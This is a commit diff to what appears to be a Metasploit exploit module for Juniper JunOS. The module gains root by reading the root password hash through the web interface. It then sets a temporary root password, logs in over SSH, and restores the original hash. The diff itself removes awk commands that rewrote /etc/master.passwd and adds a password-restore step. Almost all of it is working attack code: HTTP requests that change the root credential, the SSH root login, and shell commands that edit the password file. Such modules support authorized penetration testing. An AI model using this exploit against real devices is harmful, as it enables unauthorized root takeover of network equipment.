Fixed root password resetting

jheysel-r7 · Sep 29, 2023 · 37bc4ca · 37bc4ca
1 parent 2928d47
commit 37bc4ca
Showing 1 changed file with 7 additions and 25 deletions.
diff --git a/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb b/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb
@@ -101,25 +101,6 @@ def initialize(info = {})
     ])
   end
 
-  def on_new_session(session)
-    super
-    if target['Type'] == :nix_stream
-      print_status('Rewriting the original root password hash to /etc/master.passwd')
-
-      tmp_file_name = rand_text_alphanumeric(8..16)
-
-      commands = [
-        "awk -F: -v originalpass='#{@og_encrypted_root_pass}' 'BEGIN {OFS=FS} $1==\"root\" {$2=originalpass} {print}' /etc/master.passwd > /tmp/#{tmp_file_name}",
-        "cp /tmp/#{tmp_file_name} /etc/master.passwd",
-        "rm /tmp/#{tmp_file_name}"
-      ]
-
-      commands.each do |command|
-        session.shell_command_token(command)
-      end
-    end
-  end
-
   def check
     non_existent_file = rand_text_alphanumeric(8..16)
     res = send_request_cgi(
@@ -229,10 +210,7 @@ def get_encrypted_root_password(php_session_id, csrf_token)
     og_encrypted_root_pass
   end
 
-  def set_new_root_password(php_session_id, csrf_token)
-    password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])
-    print_status "Temporary root password Hash: #{password_hash}"
-
+  def set_root_password(php_session_id, csrf_token, password_hash)
     post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),
@@ -254,7 +232,7 @@ def set_new_root_password(php_session_id, csrf_token)
     unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'
       fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")
     end
-    print_status("Successfully changed the root user's password to #{datastore['TMP_ROOT_PASSWORD']}")
+    print_status("Successfully changed the root user's password ")
   end
 
   def ssh_login
@@ -286,13 +264,17 @@ def exploit
       php_session_id = get_php_session_id
       csrf_token = get_csrf_token(php_session_id)
       @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token)
-      set_new_root_password(php_session_id, csrf_token)
+      tmp_password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])
+      print_status "Temporary root password Hash: #{tmp_password_hash}"
+      set_root_password(php_session_id, csrf_token, tmp_password_hash)
 
       if (ssh = ssh_login)
         print_good('Logged in as root')
         handler(ssh.lsock)
       end
 
+      set_root_password(php_session_id, csrf_token, @og_encrypted_root_pass)
+
     when :php_memory
       send_php_exploit('/dev/fd/0', payload.encoded)
     else